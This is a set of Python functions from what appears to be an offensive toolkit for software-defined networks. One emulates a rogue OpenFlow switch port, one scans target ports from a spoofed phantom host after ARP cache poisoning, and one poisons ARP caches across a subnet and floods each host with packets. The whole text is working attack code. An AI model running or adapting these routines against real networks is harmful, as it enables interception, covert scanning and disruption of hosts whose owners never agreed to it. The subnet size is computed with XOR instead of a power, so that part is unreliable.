def addPort(self, port_no=0, hw_addr="", port_name="", port_config=0, port_state=PortState.OFPPS_STP_LISTEN, port_curr=0, port_advertised=0, port_supported=0, port_peer=0): if(port_no == 0): port_no = randint(30000,65534) if(hw_addr == ""): hw_addr = sdnpwn.generateRandomMacAddress(self.switch_vendor_ouid) if(port_name == ""): port_name = "OF Port " + str(randint(1,10000)) initQueueID = randint(30000,65534) port = PhyPort(port_no=port_no, hw_addr=HWAddress(hw_addr), name=port_name, #config=PortConfig.OFPC_PORT_DOWN, #state=PortState.OFPPS_LINK_DOWN, config=port_config, state=port_state, curr=port_curr, advertised=port_advertised, supported=port_supported, peer=port_peer) self.switch_ports.append(port) self.switch_features["ports"] = self.switch_ports self.switch_stats["port"][str(port_no)] = PortStats(port_no=port_no, rx_packets=0, tx_packets=0, rx_bytes=0, tx_bytes=0, rx_dropped=0, tx_dropped=0, rx_errors=0, tx_errors=0, rx_frame_err=0, rx_over_err=0, rx_crc_err=0, collisions=0) self.switch_stats["queue"][str(port_no) + ":" + str(initQueueID)] = QueueStats(port_no=port_no, queue_id=initQueueID, tx_bytes=0, tx_packets=0, tx_errors=0)
def run(params): global scanPrepped scanPrepped = False conf.verb = 0 #Set scapy verbose mode off signal.signal(signal.SIGINT, signal_handler) interface = None targetIP = None targetMAC = None targetPort = None phantomIP = None phantomMAC = None if ("--iface" in params): interface = params[params.index("--iface") + 1] if ("--target-ip" in params): targetIP = params[params.index("--target-ip") + 1] if ("--target-mac" in params): targetMAC = params[params.index("--target-mac") + 1] if ("--ports" in params): targetPort = params[params.index("--ports") + 1] if ("--phantom-ip" in params): phantomIP = params[params.index("--phantom-ip") + 1] if ("--phantom-mac" in params): phantomMAC = params[params.index("--phantom-mac") + 1] if (interface == None or targetIP == None or targetPort == None or phantomIP == None): print(info()) print(usage()) return if (targetMAC == None): sdnpwn.message("Sending ARP request for target MAC", sdnpwn.NORMAL) targetMAC = sdnpwn.getTargetMacAddress(interface, targetIP) sdnpwn.message("Got target MAC: " + targetMAC, sdnpwn.NORMAL) if (phantomMAC == None): phantomMAC = sdnpwn.generateRandomMacAddress() sdnpwn.message("Generated Phantom host MAC: " + phantomMAC, sdnpwn.NORMAL) targetPorts = targetPort.split(",") sourcePort = getUniqueNum() tcpSeqNum = getUniqueNum() thisHostIP = sdnpwn.getIPAddress(interface) thisHostMAC = sdnpwn.getMacAddress(interface) if ((thisHostIP == '0') or (thisHostMAC == '0')): sdnpwn.message("Invalid interface", sdnpwn.ERROR) exit(0) prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC) while (dpap.isPoisoningComplete() == False): sleep(2) sdnpwn.message("Waiting for poisoning to complete...", sdnpwn.NORMAL) sdnpwn.message("Starting port scan", sdnpwn.SUCCESS) for p in targetPorts: scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC, phantomIP, phantomMAC, p) sleep(2) sdnpwn.message("Finishing up...", sdnpwn.NORMAL) dpap.stopPoisoning() return
def run(params): conf.verb = 0 interface = None target = None targetMAC = None phantomIP = None phantomMAC = None packetCount = 0 targets = {} try: if ("--iface" in params): interface = params[params.index("--iface") + 1] if ("--target" in params): target = params[params.index("--target") + 1] if ("--phantom-ip" in params): phantomIP = params[params.index("--phantom-ip") + 1] if ("--phantom-mac" in params): phantomMAC = params[params.index("--phantom-mac") + 1] if ("--packets" in params): packetCount = int(params[params.index("--packets") + 1]) if (interface == None or target == None or packetCount == None or phantomIP == None): print(info()) print(usage()) return if ("/" in target): sdnpwn.message("Building list of target hosts (may take a minute)", sdnpwn.NORMAL) targetNetSplit = target.split("/") targetNetHostBits = 32 - int(targetNetSplit[1]) targetNetAddress = targetNetSplit[0] noOfNetworkHosts = (2 ^ targetNetHostBits) - 2 targetNetAddSplit = targetNetAddress.split(".") #TODO: Change this to support networks with a mask < 24 bits finalOctetVal = int(targetNetAddSplit[3]) netAddressTemplate = str(targetNetAddSplit[0]) + "." + str( targetNetAddSplit[1]) + "." + str(targetNetAddSplit[2]) + "." for i in range(finalOctetVal, noOfNetworkHosts): try: targets[netAddressTemplate + str(i)] = sdnpwn.getTargetMacAddress( interface, netAddressTemplate + str(i)) except: pass sdnpwn.message("Found " + str(len(targets)) + " targets in total", sdnpwn.NORMAL) else: targets[target] = sdnpwn.getTargetMacAddress(interface, target) except Exception as e: print(e) print(info()) print(usage()) return if (phantomMAC == None): phantomMAC = sdnpwn.generateRandomMacAddress() sdnpwn.message("Generated Phantom host MAC: " + phantomMAC, sdnpwn.NORMAL) thisHostIP = sdnpwn.getIPAddress(interface) thisHostMAC = sdnpwn.getMacAddress(interface) srcPort = random.randint(35000, 60000) dstPort = random.randint(35000, 60000) sdnpwn.message("Starting attack", sdnpwn.NORMAL) for t in targets: try: poisoningThread = Thread(target=dpap.arpCachePoison, args=(interface, t, targets[t], phantomIP, phantomMAC, thisHostIP, thisHostMAC, True, 2)).start() except Exception as e: sdnpwn.message("Issue starting poisoning thread", sdnpwn.ERROR) print(e) return while (dpap.isPoisoningComplete() == False): sleep(1) sdnpwn.message("Starting packet stream to " + t, sdnpwn.NORMAL) pkt = preparePacket(t, targets[t], dstPort, phantomIP, thisHostMAC, srcPort) sendPacket(interface, pkt, packetCount) sdnpwn.message("Finishing up...", sdnpwn.NORMAL) dpap.stopPoisoning() return